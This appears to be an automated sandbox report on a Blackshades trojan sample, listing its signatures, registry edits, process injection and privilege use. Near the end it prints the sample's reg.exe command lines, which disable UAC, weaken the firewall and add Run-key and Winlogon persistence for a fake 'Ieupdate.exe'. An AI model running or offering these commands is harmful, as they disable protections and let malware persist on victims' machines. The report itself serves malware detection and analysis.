Malware Analysis Report

2025-04-03 10:09

Sample ID 250204-3lwxmszlfl
Target 65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410
SHA256 65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410
Tags
blackshades defense_evasion discovery persistence rat trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410

Threat Level: Known bad

The file 65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410 was found to be: Known bad.

Malicious Activity Summary

blackshades defense_evasion discovery persistence rat trojan upx

Blackshades

Blackshades payload

Modifies WinLogon for persistence

UAC bypass

Modifies firewall policy service

Blackshades family

Adds policy Run key to start application

Boot or Logon Autostart Execution: Active Setup

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Checks whether UAC is enabled

Adds Run key to start application

Suspicious use of SetThreadContext

UPX packed file

Drops file in Program Files directory

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Modifies registry key

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-02-04 23:36

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-04 23:36

Reported

2025-02-04 23:39

Platform

win7-20241010-en

Max time kernel

149s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe"

Signatures

Blackshades

rat blackshades

Blackshades family

blackshades

Blackshades payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe, C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe" C:\Windows\SysWOW64\reg.exe N/A

Modifies firewall policy service

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files (x86)\Internet Explorer\Ieupdate.exe = "C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe:*:Enabled:Windows Messanger" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Users\Admin\AppData\Roaming\vb6.exe = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe:*:Enabled:Windows Messanger" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile C:\Windows\SysWOW64\reg.exe N/A

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3} C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3} C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\IeUpdate = "C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\IeUpdate = "C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Checks whether UAC is enabled

defense_evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2308 set thread context of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 set thread context of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
File created C:\Program Files (x86)\Internet Explorer\Ieupdate.txt C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\Ieupdate.txt C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe N/A
File created C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 1 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeTcbPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSystemtimePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeBackupPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeAuditPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeUndockPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeManageVolumePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeImpersonatePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 31 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 32 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 33 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 34 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 35 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2824 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 3000 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3000 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3000 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3000 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3000 wrote to memory of 2564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3000 wrote to memory of 2564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3000 wrote to memory of 2564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3000 wrote to memory of 2564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2824 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2900 wrote to memory of 2752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2900 wrote to memory of 2752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2900 wrote to memory of 2752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2900 wrote to memory of 2752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2824 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2560 wrote to memory of 1876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2560 wrote to memory of 1876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2560 wrote to memory of 1876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2560 wrote to memory of 1876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2824 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2312 wrote to memory of 588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2312 wrote to memory of 588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2312 wrote to memory of 588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2312 wrote to memory of 588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2824 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2824 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2824 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2824 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2824 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2824 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2824 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

Processes

C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe

"C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\JNYVYK.bat" "

C:\Windows\SysWOW64\reg.exe

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center /v UACDisableNotify /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\dQcxh.bat" "

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "IeUpdate" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\POzYI.bat" "

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "IeUpdate" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\aptNl.bat" "

C:\Windows\SysWOW64\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "Explorer.exe, C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /f

C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

"C:\Program Files (x86)\Internet Explorer\Ieupdate.exe"

C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

"C:\Program Files (x86)\Internet Explorer\Ieupdate.exe"

C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

"C:\Program Files (x86)\Internet Explorer\Ieupdate.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f

